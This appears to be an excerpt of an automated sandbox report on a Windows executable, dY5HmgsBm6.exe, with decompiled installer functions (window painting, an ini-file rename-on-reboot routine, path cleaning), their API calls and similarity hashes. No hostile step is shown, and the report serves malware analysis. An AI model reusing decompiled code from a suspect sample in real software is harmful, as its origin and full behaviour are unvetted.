                                                        0x0040454a
                                                        0x0040454a
                                                        0x0040454a
                                                        0x00404550
                                                        0x00404550
                                                        0x00404553
                                                        0x00000000
                                                        0x0040455a
                                                        0x00404489
                                                        0x0040448b
                                                        0x0040448e
                                                        0x00404495
                                                        0x00404497
                                                        0x0040449e
                                                        0x004044a0
                                                        0x004044a3
                                                        0x004044a6
                                                        0x004044ab
                                                        0x004044b1
                                                        0x004044b4
                                                        0x004044bb
                                                        0x004044c9
                                                        0x004044e1
                                                        0x004044e3
                                                        0x004044eb
                                                        0x004044fa
                                                        0x004044fc
                                                        0x004044fc
                                                        0x004044bb
                                                        0x0040449e
                                                        0x004044ff
                                                        0x00404506
                                                        0x00000000
                                                        0x00404508
                                                        0x00404508
                                                        0x0040450f
                                                        0x00000000
                                                        0x00000000
                                                        0x00404511
                                                        0x00404515
                                                        0x00404526
                                                        0x00404526
                                                        0x00404528
                                                        0x0040452c
                                                        0x0040453a
                                                        0x0040453a
                                                        0x00000000
                                                        0x0040453e
                                                        0x00404506
                                                        0x00404423
                                                        0x00404426
                                                        0x00000000
                                                        0x00000000
                                                        0x0040442e
                                                        0x00404434
                                                        0x00000000
                                                        0x00000000
                                                        0x0040443a
                                                        0x00404440
                                                        0x00404440
                                                        0x00404443
                                                        0x00404446
                                                        0x00000000
                                                        0x00000000
                                                        0x00404469
                                                        0x00404469
                                                        0x0040446b
                                                        0x0040446d
                                                        0x00404472
                                                        0x00000000
                                                        0x004042fc
                                                        0x004042fc
                                                        0x004042ff
                                                        0x00404304
                                                        0x00404306
                                                        0x00404315
                                                        0x00404315
                                                        0x0040431c
                                                        0x0040431f
                                                        0x00404321
                                                        0x00404326
                                                        0x0040432f
                                                        0x00404335
                                                        0x00404341
                                                        0x00404344
                                                        0x0040434d
                                                        0x00404352
                                                        0x00404355
                                                        0x0040435a
                                                        0x00404371
                                                        0x00404378
                                                        0x0040438b
                                                        0x0040438e
                                                        0x004043a3
                                                        0x004043aa
                                                        0x004043af
                                                        0x004043b4
                                                        0x004043b4
                                                        0x004043c3
                                                        0x004043d2
                                                        0x004043e4
                                                        0x004043e9
                                                        0x004043f9
                                                        0x004043fb
                                                        0x00000000
                                                        0x00404401

                                                        APIs
                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                        • GetDlgItem.USER32 ref: 00404385
                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                        • GetSysColor.USER32(?), ref: 004043B4
                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                        • lstrlenA.KERNEL32(?), ref: 004043D5
                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                        • GetDlgItem.USER32 ref: 0040445B
                                                        • SendMessageA.USER32(00000000), ref: 0040445E
                                                        • GetDlgItem.USER32 ref: 00404489
                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                        • LoadCursorA.USER32 ref: 004044D8
                                                        • SetCursor.USER32(00000000), ref: 004044E1
                                                        • LoadCursorA.USER32 ref: 004044F7
                                                        • SetCursor.USER32(00000000), ref: 004044FA
                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: : Completed$N
                                                        • API String ID: 3103080414-2140067464
                                                        • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                        • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                        • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                        • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 90%
                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                        				struct tagLOGBRUSH _v16;
                                                        				struct tagRECT _v32;
                                                        				struct tagPAINTSTRUCT _v96;
                                                        				struct HDC__* _t70;
                                                        				struct HBRUSH__* _t87;
                                                        				struct HFONT__* _t94;
                                                        				long _t102;
                                                        				signed int _t126;
                                                        				struct HDC__* _t128;
                                                        				intOrPtr _t130;
                                                        
                                                        				if(_a8 == 0xf) {
                                                        					_t130 =  *0x42f434;
                                                        					_t70 = BeginPaint(_a4,  &_v96);
                                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                        					_a8 = _t70;
                                                        					GetClientRect(_a4,  &_v32);
                                                        					_t126 = _v32.bottom;
                                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                                        					while(_v32.top < _t126) {
                                                        						_a12 = _t126 - _v32.top;
                                                        						asm("cdq");
                                                        						asm("cdq");
                                                        						asm("cdq");
                                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                        						_t87 = CreateBrushIndirect( &_v16);
                                                        						_v32.bottom = _v32.bottom + 4;
                                                        						_a16 = _t87;
                                                        						FillRect(_a8,  &_v32, _t87);
                                                        						DeleteObject(_a16);
                                                        						_v32.top = _v32.top + 4;
                                                        					}
                                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                                        						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                        						_a16 = _t94;
                                                        						if(_t94 != 0) {
                                                        							_t128 = _a8;
                                                        							_v32.left = 0x10;
                                                        							_v32.top = 8;
                                                        							SetBkMode(_t128, 1);
                                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                                        							_a8 = SelectObject(_t128, _a16);
                                                        							DrawTextA(_t128, "Name Setup", 0xffffffff,  &_v32, 0x820);
                                                        							SelectObject(_t128, _a8);
                                                        							DeleteObject(_a16);
                                                        						}
                                                        					}
                                                        					EndPaint(_a4,  &_v96);
                                                        					return 0;
                                                        				}
                                                        				_t102 = _a16;
                                                        				if(_a8 == 0x46) {
                                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
                                                        				}
                                                        				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                        			}













                                                        0x0040100a
                                                        0x00401039
                                                        0x00401047
                                                        0x0040104d
                                                        0x00401051
                                                        0x0040105b
                                                        0x00401061
                                                        0x00401064
                                                        0x004010f3
                                                        0x00401089
                                                        0x0040108c
                                                        0x004010a6
                                                        0x004010bd
                                                        0x004010cc
                                                        0x004010cf
                                                        0x004010d5
                                                        0x004010d9
                                                        0x004010e4
                                                        0x004010ed
                                                        0x004010ef
                                                        0x004010ef
                                                        0x00401100
                                                        0x00401105
                                                        0x0040110d
                                                        0x00401110
                                                        0x00401112
                                                        0x00401118
                                                        0x0040111f
                                                        0x00401126
                                                        0x00401130
                                                        0x00401142
                                                        0x00401156
                                                        0x00401160
                                                        0x00401165
                                                        0x00401165
                                                        0x00401110
                                                        0x0040116e
                                                        0x00000000
                                                        0x00401178
                                                        0x00401010
                                                        0x00401013
                                                        0x00401015
                                                        0x0040101f
                                                        0x0040101f
                                                        0x00000000

                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32 ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32 ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextA.USER32(00000000,Name Setup,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F$Name Setup
                                                        • API String ID: 941294808-4002928617
                                                        • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                        • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                        • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                        • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00405D66(void* __ecx) {
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				long _t12;
                                                        				long _t24;
                                                        				char* _t31;
                                                        				int _t37;
                                                        				void* _t38;
                                                        				intOrPtr* _t39;
                                                        				long _t42;
                                                        				CHAR* _t44;
                                                        				void* _t46;
                                                        				void* _t48;
                                                        				void* _t49;
                                                        				void* _t52;
                                                        				void* _t53;
                                                        
                                                        				_t38 = __ecx;
                                                        				_t44 =  *(_t52 + 0x14);
                                                        				 *0x42c620 = 0x4c554e;
                                                        				if(_t44 == 0) {
                                                        					L3:
                                                        					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                        						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
                                                        						_t53 = _t52 + 0x10;
                                                        						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
                                                        						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
                                                        						_t48 = _t12;
                                                        						 *(_t53 + 0x18) = _t48;
                                                        						if(_t48 != 0xffffffff) {
                                                        							_t42 = GetFileSize(_t48, 0);
                                                        							_t6 = _t37 + 0xa; // 0xa
                                                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                        							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
                                                        								L18:
                                                        								return CloseHandle(_t48);
                                                        							} else {
                                                        								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
                                                        									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
                                                        									if(_t49 == 0) {
                                                        										_t48 =  *(_t53 + 0x18);
                                                        										L16:
                                                        										_t24 = _t42;
                                                        										L17:
                                                        										E00405C4B(_t24 + _t46, 0x42c220, _t37);
                                                        										SetFilePointer(_t48, 0, 0, 0);
                                                        										E00405D37(_t48, _t46, _t42 + _t37);
                                                        										GlobalFree(_t46);
                                                        										goto L18;
                                                        									}
                                                        									_t39 = _t46 + _t42;
                                                        									_t31 = _t39 + _t37;
                                                        									while(_t39 > _t49) {
                                                        										 *_t31 =  *_t39;
                                                        										_t31 = _t31 - 1;
                                                        										_t39 = _t39 - 1;
                                                        									}
                                                        									_t24 = _t49 - _t46 + 1;
                                                        									_t48 =  *(_t53 + 0x18);
                                                        									goto L17;
                                                        								}
                                                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                        								_t42 = _t42 + 0xa;
                                                        								goto L16;
                                                        							}
                                                        						}
                                                        					}
                                                        				} else {
                                                        					CloseHandle(E00405C90(_t44, 0, 1));
                                                        					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                        						goto L3;
                                                        					}
                                                        				}
                                                        				return _t12;
                                                        			}



















                                                        0x00405d66
                                                        0x00405d6f
                                                        0x00405d76
                                                        0x00405d8a
                                                        0x00405db2
                                                        0x00405dbd
                                                        0x00405dc1
                                                        0x00405de1
                                                        0x00405de8
                                                        0x00405df2
                                                        0x00405dff
                                                        0x00405e04
                                                        0x00405e09
                                                        0x00405e0d
                                                        0x00405e1c
                                                        0x00405e1e
                                                        0x00405e2b
                                                        0x00405e2f
                                                        0x00405eca
                                                        0x00000000
                                                        0x00405e45
                                                        0x00405e52
                                                        0x00405e76
                                                        0x00405e7a
                                                        0x00405e99
                                                        0x00405e9d
                                                        0x00405e9d
                                                        0x00405e9f
                                                        0x00405ea8
                                                        0x00405eb3
                                                        0x00405ebe
                                                        0x00405ec4
                                                        0x00000000
                                                        0x00405ec4
                                                        0x00405e7c
                                                        0x00405e7f
                                                        0x00405e8a
                                                        0x00405e86
                                                        0x00405e88
                                                        0x00405e89
                                                        0x00405e89
                                                        0x00405e91
                                                        0x00405e93
                                                        0x00000000
                                                        0x00405e93
                                                        0x00405e5d
                                                        0x00405e63
                                                        0x00000000
                                                        0x00405e63
                                                        0x00405e2f
                                                        0x00405e0d
                                                        0x00405d8c
                                                        0x00405d97
                                                        0x00405da0
                                                        0x00405da4
                                                        0x00000000
                                                        0x00000000
                                                        0x00405da4
                                                        0x00405ed5

                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                        • GetShortPathNameA.KERNEL32 ref: 00405DA0
                                                          • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                          • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                        • GetShortPathNameA.KERNEL32 ref: 00405DBD
                                                        • wsprintfA.USER32 ref: 00405DDB
                                                        • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                        • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                        • GlobalFree.KERNEL32 ref: 00405EC4
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                          • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dY5HmgsBm6.exe,80000000,00000003), ref: 00405C94
                                                          • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %s=%s$[Rename]
                                                        • API String ID: 2171350718-1727408572
                                                        • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                        • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                        • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                        • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E004063D2(CHAR* _a4) {
                                                        				char _t5;
                                                        				char _t7;
                                                        				char* _t15;
                                                        				char* _t16;
                                                        				CHAR* _t17;
                                                        
                                                        				_t17 = _a4;
                                                        				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                        					_t17 =  &(_t17[4]);
                                                        				}
                                                        				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
                                                        					_t17 =  &(_t17[2]);
                                                        				}
                                                        				_t5 =  *_t17;
                                                        				_t15 = _t17;
                                                        				_t16 = _t17;
                                                        				if(_t5 != 0) {
                                                        					do {
                                                        						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
                                                        							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
                                                        							_t16 = CharNextA(_t16);
                                                        						}
                                                        						_t17 = CharNextA(_t17);
                                                        						_t5 =  *_t17;
                                                        					} while (_t5 != 0);
                                                        				}
                                                        				 *_t16 =  *_t16 & 0x00000000;
                                                        				while(1) {
                                                        					_t16 = CharPrevA(_t15, _t16);
                                                        					_t7 =  *_t16;
                                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                        						break;
                                                        					}
                                                        					 *_t16 =  *_t16 & 0x00000000;
                                                        					if(_t15 < _t16) {
                                                        						continue;
                                                        					}
                                                        					break;
                                                        				}
                                                        				return _t7;
                                                        			}








                                                        0x004063d4
                                                        0x004063dc
                                                        0x004063f0
                                                        0x004063f0
                                                        0x004063f6
                                                        0x00406403
                                                        0x00406403
                                                        0x00406404
                                                        0x00406406
                                                        0x0040640a
                                                        0x0040640c
                                                        0x00406415
                                                        0x00406417
                                                        0x00406431
                                                        0x00406439
                                                        0x00406439
                                                        0x0040643e
                                                        0x00406440
                                                        0x00406442
                                                        0x00406446
                                                        0x00406447
                                                        0x0040644a
                                                        0x00406452
                                                        0x00406454
                                                        0x00406458
                                                        0x00000000
                                                        0x00000000
                                                        0x0040645e
                                                        0x00406463
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406463
                                                        0x00406468

                                                        APIs
                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\dY5HmgsBm6.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                        • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\dY5HmgsBm6.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                        • CharPrevA.USER32(?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                        • "C:\Users\user\Desktop\dY5HmgsBm6.exe" , xrefs: 0040640E
                                                        • *?|<>/":, xrefs: 0040641A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\dY5HmgsBm6.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-303537465
                                                        • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                        • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                        • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                        • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                        				struct tagLOGBRUSH _v16;
                                                        				long _t39;
                                                        				long _t41;
                                                        				void* _t44;
                                                        				signed char _t50;
                                                        				long* _t54;
                                                        
                                                        				if(_a4 + 0xfffffecd > 5) {
                                                        					L18:
                                                        					return 0;
                                                        				}
                                                        				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                        				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                        					goto L18;
                                                        				} else {
                                                        					_t50 = _t54[5];
                                                        					if((_t50 & 0xffffffe0) != 0) {
                                                        						goto L18;
                                                        					}
                                                        					_t39 =  *_t54;
                                                        					if((_t50 & 0x00000002) != 0) {
                                                        						_t39 = GetSysColor(_t39);
                                                        					}
                                                        					if((_t54[5] & 0x00000001) != 0) {
                                                        						SetTextColor(_a8, _t39);
                                                        					}
                                                        					SetBkMode(_a8, _t54[4]);
                                                        					_t41 = _t54[1];
                                                        					_v16.lbColor = _t41;
                                                        					if((_t54[5] & 0x00000008) != 0) {
                                                        						_t41 = GetSysColor(_t41);
                                                        						_v16.lbColor = _t41;
                                                        					}
                                                        					if((_t54[5] & 0x00000004) != 0) {
                                                        						SetBkColor(_a8, _t41);
                                                        					}
                                                        					if((_t54[5] & 0x00000010) != 0) {
                                                        						_v16.lbStyle = _t54[2];
                                                        						_t44 = _t54[3];
                                                        						if(_t44 != 0) {
                                                        							DeleteObject(_t44);
                                                        						}
                                                        						_t54[3] = CreateBrushIndirect( &_v16);
                                                        					}
                                                        					return _t54[3];
                                                        				}
                                                        			}









                                                        0x004041f4
                                                        0x004042aa
                                                        0x00000000
                                                        0x004042aa
                                                        0x00404205
                                                        0x00404209
                                                        0x00000000
                                                        0x00404223
                                                        0x00404223
                                                        0x0040422c
                                                        0x00000000
                                                        0x00000000
                                                        0x0040422e
                                                        0x0040423a
                                                        0x0040423d
                                                        0x0040423d
                                                        0x00404243
                                                        0x00404249
                                                        0x00404249
                                                        0x00404255
                                                        0x0040425b
                                                        0x00404262
                                                        0x00404265
                                                        0x00404268
                                                        0x0040426a
                                                        0x0040426a
                                                        0x00404272
                                                        0x00404278
                                                        0x00404278
                                                        0x00404282
                                                        0x00404287
                                                        0x0040428a
                                                        0x0040428f
                                                        0x00404292
                                                        0x00404292
                                                        0x004042a2
                                                        0x004042a2
                                                        0x00000000
                                                        0x004042a5

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                        • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                        • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                        • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
                                                        				long _v8;
                                                        				signed char _v12;
                                                        				unsigned int _v16;
                                                        				void* _v20;
                                                        				intOrPtr _v24;
                                                        				long _v56;
                                                        				void* _v60;
                                                        				long _t15;
                                                        				unsigned int _t19;
                                                        				signed int _t25;
                                                        				struct HWND__* _t28;
                                                        
                                                        				_t28 = _a4;
                                                        				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                        				if(_a8 == 0) {
                                                        					L4:
                                                        					_v56 = _t15;
                                                        					_v60 = 4;
                                                        					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                        					return _v24;
                                                        				}
                                                        				_t19 = GetMessagePos();
                                                        				_v16 = _t19 >> 0x10;
                                                        				_v20 = _t19;
                                                        				ScreenToClient(_t28,  &_v20);
                                                        				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                        				if((_v12 & 0x00000066) != 0) {
                                                        					_t15 = _v8;
                                                        					goto L4;
                                                        				}
                                                        				return _t25 | 0xffffffff;
                                                        			}














                                                        0x00404adc
                                                        0x00404ae9
                                                        0x00404aef
                                                        0x00404b2d
                                                        0x00404b2d
                                                        0x00404b3c
                                                        0x00404b43
                                                        0x00000000
                                                        0x00404b45
                                                        0x00404af1
                                                        0x00404b00
                                                        0x00404b08
                                                        0x00404b0b
                                                        0x00404b1d
                                                        0x00404b23
                                                        0x00404b2a
                                                        0x00000000
                                                        0x00404b2a
                                                        0x00000000

                                                        APIs
                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                        • GetMessagePos.USER32 ref: 00404AF1
                                                        • ScreenToClient.USER32 ref: 00404B0B
                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
